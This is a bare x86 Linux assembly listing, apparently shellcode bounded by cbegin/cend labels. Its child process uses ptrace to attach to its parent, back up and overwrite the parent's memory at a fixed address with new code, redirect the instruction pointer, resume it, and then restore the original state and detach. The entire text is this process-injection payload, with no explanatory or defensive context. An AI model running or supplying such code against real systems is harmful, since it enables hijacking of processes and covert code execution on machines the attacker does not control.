.globl cbegin .globl cend cbegin: /* getppid */ pushl $64 popl %eax int $0x80 /* movl %eax, %ecx */ pushl %eax xchgl %ebp, %eax /* z_fork */ pushl $2 popl %eax int $0x80 or %eax, %eax je fchild /* waitpid (pid, NULL, 0) */ pushl $7 popl %esi xchgl %esi, %eax /* eax = 7, esi = ppid */ xorl %ecx, %ecx xorl %edx, %edx int $0x80 xorl %eax, %eax movb $162, %al pushl $10 pushl $10 movl %esp, %ebx movl %esp, %ecx int $0x80 ui: jmp ui /* exit */ fexit: pushl $1 popl %eax xorl %ebx, %ebx int $0x80 /*** CHILD ***/ fchild: pushl $2 /* second fork */ popl %eax int $0x80 or %eax, %eax jne fexit popl %ecx /* parent process pid */ /* ptrace attach */ pushl $26 popl %eax cdq pushl $16 popl %ebx xorl %esi, %esi int $0x80 /* ptrace peekdata */ movl $0x08048210, %edx /* movl $0xbf7ff010, %edx */ movl $0xbffff010, %esi pushl $127 popl %edi loopa: movl %ebp, %ecx pushl $26 popl %eax pushl $2 popl %ebx pushl %edi int $0x80 popl %edi incl %edx incl %esi decl %edi jnz loopa /* ptrace getregs */ movl %ebp, %ecx pushl $26 popl %eax pushl $12 popl %ebx pusha movl %esp, %esi int $0x80 /* ptrace setregs */ movl %ebp, %ecx pushl $26 popl %eax pushl $13 popl %ebx movl %esp, %esi movl 48(%esi), %edi pushl %edi movl $0x08048210, 48(%esi) /* movl $0xbf7ff010, 48(%esi)*/ int $0x80 jmp pointX pointY: popl %esi movl $0x08048210, %edx pushl $20 popl %edi loopc: movl %ebp, %ecx pushl $26 popl %eax pushl $5 popl %ebx pushl %edi pushl %esi movl (%esi), %esi int $0x80 popl %esi popl %edi incl %edx incl %esi decl %edi jnz loopc /* ptrace pokedata */ /* movl %ebp, %ecx pushl $26 popl %eax pushl $5 popl %ebx movl $0xccccfeeb, %esi*/ /* movl $0xbf7ff010, %edx*/ movl $0x08048210, %edx /* int $0x80*/ /*ptrace cont */ movl %ebp, %ecx pushl $26 popl %eax cdq pushl $7 popl %ebx xorl %esi, %esi int $0x80 /* wait 4 */ /* 0 on return */ cdq movl %eax, %ebx decl %ebx movl %eax, %ecx movb $114, %al int $0x80 /* ptrace pokedata */ movl $0x08048210, %edx movl $0xbffff010, %esi /* movl $0xbf7ff010, %edx*/ pushl $127 popl %edi loopb: movl %ebp, %ecx pushl $26 popl %eax pushl $5 popl %ebx pushl %edi pushl %esi movl (%esi), %esi int $0x80 popl %esi popl %edi incl %edx incl %esi decl %edi jnz loopb /* ptrace setregs */ popl %edi movl %ebp, %ecx pushl $26 popl %eax pushl $13 popl %ebx movl %esp, %esi movl %edi, 48(%esi) int $0x80 /* ptrace detach */ movl %ebp, %ecx pushl $17 popl %ebx pushl $26 popl %eax cdq movl %edx, %esi int $0x80 /* exit */ xorl %ecx, %ecx incl %esi xchgl %esi, %eax int $0x80 pointX: call pointY pushl $2 /* second fork */ popl %eax int $0x80 or %eax, %eax je pointA int $0x3 pointA: jmp pointA cend: